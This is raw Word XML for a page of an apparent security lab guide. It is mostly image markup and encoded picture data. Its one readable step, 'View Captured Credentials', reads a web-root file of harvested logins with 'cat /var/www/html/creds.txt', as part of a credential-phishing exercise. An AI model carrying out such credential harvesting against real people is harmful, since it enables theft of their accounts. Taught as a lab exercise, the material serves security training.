style="position:absolute;left:95;top:94;width:36701;height:18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jExAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6042RSomuIoJQeihVq+T4yD6TaPa9kN1q+u9dQehxmJlvmNmid426UOdrYQOjYQKK&#10;uBBbc2ngZ7cevIPyAdliI0wG/sjDYv78NMPMypU3dNmGUkUI+wwNVCG0mda+qMihH0pLHL2jdA5D&#10;lF2pbYfXCHeNTpNkoh3WHBcqbGlVUXHe/joDh835JONDjiyf+de42efp95sY8/rSL6egAvXhP/xo&#10;f1gD6QTuX+IP0PMbAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHp1yMTEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                  <v:imagedata r:id="rId27" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 27" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:36798;height:18415;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3679825,18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4gxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gpeRDcVSSS6SikoBU9RL96e2WeSNvs27G419dd3C4LHYWa+YZbr3rTiSs43lhW8TRIQ&#10;xKXVDVcKjofNeA7CB2SNrWVS8Ese1quXwRJzbW9c0HUfKhEh7HNUUIfQ5VL6siaDfmI74uhdrDMY&#10;onSV1A5vEW5aOU2SVBpsOC7U2NFHTeX3/scoOO/cqdruvmajzSW5FyFLfUGpUsPX/n0BIlAfnuFH&#10;+1MrmGbw/yX+ALn6AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEuJPiDEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,1841500r3679698,l3679698,,,,,1841500xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F29FE59" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="6937"/>
      </w:pPr>
      <w:r>
        <w:t>12.View</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Captured</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Credentials cat /var/www/html/creds.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F6396" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="374"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40355731" wp14:editId="595ED435">
                <wp:extent cx="3427729" cy="2434590"/>
                <wp:effectExtent l="0" t="0" r="0" b="381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7729" cy="2434590"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3427729" cy="2434590"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="29" name="Image 29"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId28" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9461"/>
                            <a:ext cx="3408679" cy="2415540"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="30" name="Graphic 30"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="3418204" cy="2425065"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3418204" h="2425065">
                                <a:moveTo>
                                  <a:pt x="0" y="2425065"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3418204" y="2425065"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3418204" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="242506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9DB105" id="Group 28" o:spid="_x0000_s1026" style="width:269.9pt;height:191.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="34277,24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fEZtyAwAAbAgAAA4AAABkcnMvZTJvRG9jLnhtbJxW227cNhB9L5B/&#10;IPQea1feXduC10EQN4aBIDUaB33mUpREhCJZknvx33eGF0nxpkgbA5aG4nB4eObMcG/fnQZJDtw6&#10;odW2WF4sCsIV041Q3bb4+vzx7XVBnKeqoVIrvi1euCve3b357fZoal7pXsuGWwJBlKuPZlv03pu6&#10;LB3r+UDdhTZcwWSr7UA9DG1XNpYeIfogy2qx2JRHbRtjNePOwdf7OFnchfhty5n/o20d90RuC8Dm&#10;w9OG5w6f5d0trTtLTS9YgkF/AcVAhYJNx1D31FOyt+Is1CCY1U63/oLpodRtKxgPZ4DTLBevTvNg&#10;9d6Es3T1sTMjTUDtK55+OSz7fHiw5ot5shE9mJ80++aAl/Jouno+j+Nucj61dsBFcAhyCoy+jIzy&#10;kycMPl6uqqur6qYgDOaq1eVqfZM4Zz0k5mwd63//ycqS1nHjAG+EYwSr4T9RBNYZRT+XEqzye8uL&#10;FGT4TzEGar/tzVvIpqFe7IQU/iUoE/KGoNThSTBkFwfA5pMlogEugBNFB6iIx4F2nMAYKM8+uAIz&#10;cBZgJ4X5KKRE3tFOUEHQrwTxg9NGsd1rth+48rF6LJeAWivXC+MKYms+7DjAs4/NEpIGlesBorFC&#10;+VgqzlvuWY/7t4DjTygwBErrcSKAnnDiEVyS1yvF3KyrdUFAGDerzTKGn3SzuN5cjbpZrteroJsx&#10;+7Q21vkHrgeCBiAGJEA5renhk0uYsktiMsII+AAVtgjoOS5zCKMzFv9XWX3pqeEAAcNOib6ErhMT&#10;/ZC6DHwBypIXVl4a/QtLq6tNFVgKBvjSemJpeV0tVrm6qvVis8bYM5bYPrI0Zwa6VBM5Arb6bLGT&#10;yiZyiQ1ThobpQRfAb0GgYe5imkDquA6DokmOWOkJS4+FHqHg/KAP/FkHTz+Ve/aIYCcfqea+Y8zQ&#10;PObHy375bULsuX+WS/bI7+gJScnNCsjKc/k99/keafZgUjsewSMBgfKRFIg4p10q5CeIHWlwWoom&#10;17Cz3e6DtORA8X4KfymB37mhkO+p66NfmEpuUsHeqKWoHrR2unmBLnMEuW0L9/eeYkuTjwrkjTdg&#10;Nmw2dtmwXn7Q4Z4M6YI9n09/UWtShXmQ3WedVX5WaNEXVyr9fu91K0IVTogSUKi4YIUrLRCXrl+8&#10;M+fj4DX9SLj7BwAA//8DAFBLAwQKAAAAAAAAACEAEvtAvW21AABttQAAFQAAAGRycy9tZWRpYS9p&#10;bWFnZTEuanBlZ//Y/+AAEEpGSUYAAQEBAGAAYAAA/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUK&#10;BwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJ&#10;FA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AA&#10;EQgB3QK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&#10;AMTR/wAI9ff9MP8A